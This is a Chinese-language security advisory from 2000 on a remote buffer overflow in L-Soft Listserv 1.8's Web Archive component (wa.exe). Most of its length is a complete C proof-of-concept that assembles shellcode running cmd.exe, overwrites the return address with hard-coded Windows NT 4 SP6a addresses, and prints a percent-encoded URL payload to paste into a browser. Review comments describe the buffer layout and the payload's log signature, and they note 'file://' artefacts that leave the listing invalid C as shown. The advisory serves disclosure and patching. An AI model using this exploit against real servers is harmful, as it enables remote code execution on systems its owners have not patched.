L-Soft Listserv 1.8 Web Archive组件缓冲区溢出漏洞
发布日期:2000-05-07
更新日期:2000-05-08
受影响系统:
L-Soft Listserv 1.8
- Sun SunOS 4.1.4
- Sun SunOS 4.1.3
- Sun Solaris 8.0
- Sun Solaris 7.0
- SGI IRIX 6.5.6
- SGI IRIX 6.5.4
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Linux kernel 2.3.x
- Linux kernel 2.2.x
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- HP HP-UX 11.0
- HP HP-UX 10.0
- Digital Ultrix 4.5
- Digital Ultrix 4.4
- Digital OpenVMS AXP 7.1
- Digital OSF/1 3.2
- Digital OSF/1 3.0
- BSDI BSD/OS 4.0.1
- BSDI BSD/OS 4.0
描述:
L-Soft Listserv 的 Web Archive 组件(wa.exe)中有一段代码没有正确检查缓冲区大小。远程攻击者向 Web Archive 提交经过特殊编码的 URL 请求时,可触发缓冲区溢出并执行任意代码。
<* 来源: Cerberus Security Team <CTS@CERBERUS-INFOSEC.CO.UK> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
//
//
// LSOFT's Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield (mnemonix@globalnet.co.uk)
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////
#include <stdio.h>
// main - fills a local 2000-byte buffer with a fixed byte sequence and prints
// the first 477 bytes to stdout, each as '%' followed by the byte in hex.
// Takes no arguments, reads no input, and always returns 0.
//
// Buffer layout produced by the statements below:
//   [0, 100)    0x90 filler
//   [100, 160)  machine-code bytes, annotated with the author's mnemonics
//   [160, 420)  0xCC filler (int 3)
//   [420, 424)  four bytes the author labels "overwrite the return address"
//   [424, 464)  0x90 filler (40 bytes)
//   [464, 477)  machine-code bytes ending in "jmp edx"
//   [390, 392)  patched afterwards, inside the 0xCC region
//
// NOTE(review): 0x77f1a986 and the bytes at [420, 424) are hard-coded
// constants. The file header only claims Windows NT 4 SP6a, so presumably
// they are addresses specific to that build - not verifiable from this page.
//
// NOTE(review): for log review, the printed string is a long percent-encoded
// run dominated by "%90" and "%cc"; that pattern in a request to the Web
// Archive component is the visible trace of this listing.
int main()
{
unsigned char exploit[2000]="";
int count = 0;
// leading filler: indices 0..99 are set to 0x90
while(count <100)
{
exploit[count]=0x90;
count ++;
}
// push ebp
exploit[count]=0x55;
count ++;
// mov ebp,esp
exploit[count]=0x8B;
count ++;
exploit[count]=0xEC;
count ++;
// mov eax, 0x77f1a986
// (stored low byte first; this is the value later used by "call eax")
exploit[count]=0xb8;
count ++;
exploit[count]=0x86;
count ++;
exploit[count]=0xa9;
count ++;
exploit[count]=0xf1;
count ++;
exploit[count]=0x77;
count ++;
// mov ebx, 0xffffffff
exploit[count]=0xbb;
count ++;
exploit[count]=0xff;
count ++;
exploit[count]=0xff;
count ++;
exploit[count]=0xff;
count ++;
exploit[count]=0xff;
count ++;
// NOTE(review): the "file:" prefix on this and the later annotation lines
// looks like a page-conversion artefact of a plain "//" comment marker. As
// published it parses as a label named "file" followed by a comment, and the
// repeated label means the listing is not valid C as shown.
file://sub ebx, 0xffffff8B
exploit[count]=0x83;
count ++;
exploit[count]=0xeb;
count ++;
exploit[count]=0x8B;
count ++;
// push ebx
exploit[count]=0x53;
count ++;
// The next seven 5-byte groups each store opcode 0x68 followed by four ASCII
// bytes. Per the file header they presumably form the command string for a
// directory listing redirected to "cerberus.txt".
// push "xt.s"
exploit[count]=0x68;
count ++;
exploit[count]=0x73;
count ++;
exploit[count]=0x2e;
count ++;
exploit[count]=0x74;
count ++;
exploit[count]=0x78;
count ++;
file://push "ureb"
exploit[count]=0x68;
count ++;
exploit[count]=0x62;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x72;
count ++;
exploit[count]=0x75;
count ++;
file://push "rec "
exploit[count]=0x68;
count ++;
exploit[count]=0x20;
count ++;
exploit[count]=0x63;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x72;
count ++;
file://push "> ri"
exploit[count]=0x68;
count ++;
exploit[count]=0x69;
count ++;
exploit[count]=0x72;
count ++;
exploit[count]=0x20;
count ++;
exploit[count]=0x3e;
count ++;
file://push "d c/"
exploit[count]=0x68;
count ++;
exploit[count]=0x2f;
count ++;
exploit[count]=0x63;
count ++;
exploit[count]=0x20;
count ++;
exploit[count]=0x64;
count ++;
file://push " exe"
exploit[count]=0x68;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x78;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x20;
count ++;
file://push "cmd."
exploit[count]=0x68;
count ++;
exploit[count]=0x63;
count ++;
exploit[count]=0x6d;
count ++;
exploit[count]=0x64;
count ++;
exploit[count]=0x2e;
count ++;
file://mov ebx, esp
exploit[count]=0x8b;
count ++;
exploit[count]=0xdc;
count ++;
file://xor esi, esi
exploit[count]=0x33;
count ++;
exploit[count]=0xf6;
count ++;
file://push esi
exploit[count]=0x56;
count ++;
file://push ebx
exploit[count]=0x53;
count ++;
file://call eax
exploit[count]=0xff;
count ++;
exploit[count]=0xd0;
count ++;
// set a break point (int 3)
// count is 160 here; indices 160..419 are filled with 0xCC
while(count <420)
{
exploit[count]=0xCC;
count ++;
}
// overwrite the return address
// (four hard-coded bytes at indices 420..423, stored low byte first)
exploit[count]=0x36;
count ++;
exploit[count]=0x28;
count ++;
exploit[count]=0xf3;
count ++;
exploit[count]=0x77;
count ++;
// put in 40 nops (0x90)
// indices 424..463
while (count < 464)
{
exploit[count]=0x90;
count ++;
}
// write our code that'll get us back into our un-tolower()ed string
// move edx, 0xFFFFFFFF
exploit[count]=0xBA;
count ++;
exploit[count]=0xFF;
count ++;
exploit[count]=0xFF;
count ++;
exploit[count]=0xFF;
count ++;
exploit[count]=0xFF;
count ++;
// sub edx, 0xFFDFAC87
exploit[count]=0x81;
count ++;
exploit[count]=0xEA;
count ++;
exploit[count]=0x87;
count ++;
exploit[count]=0xAC;
count ++;
exploit[count]=0xDF;
count ++;
exploit[count]=0xFF;
count ++;
// jmp edx
exploit[count]=0xFF;
count ++;
exploit[count]=0xE2;
count ++;
// set readable part in memory to stop first AV
// (these stores land inside the 0xCC filler written above; count is 477 here)
exploit[390]=0x36;
exploit[390]=0xf3;
exploit[391]=0x77;
// Emit bytes 0..476: "%%" prints a literal '%', and "%x" prints the byte in
// lowercase hex with no zero padding.
count = 0;
while(count < 477)
{
printf("%%%x",exploit[count]);
count ++;
}
return 0;
}
建议:
L-Soft 已经发布更新版本的 Listserv 以修复这个问题;请升级到已修复的版本,更详尽的信息可发信至 <support@lsoft.com> 获取。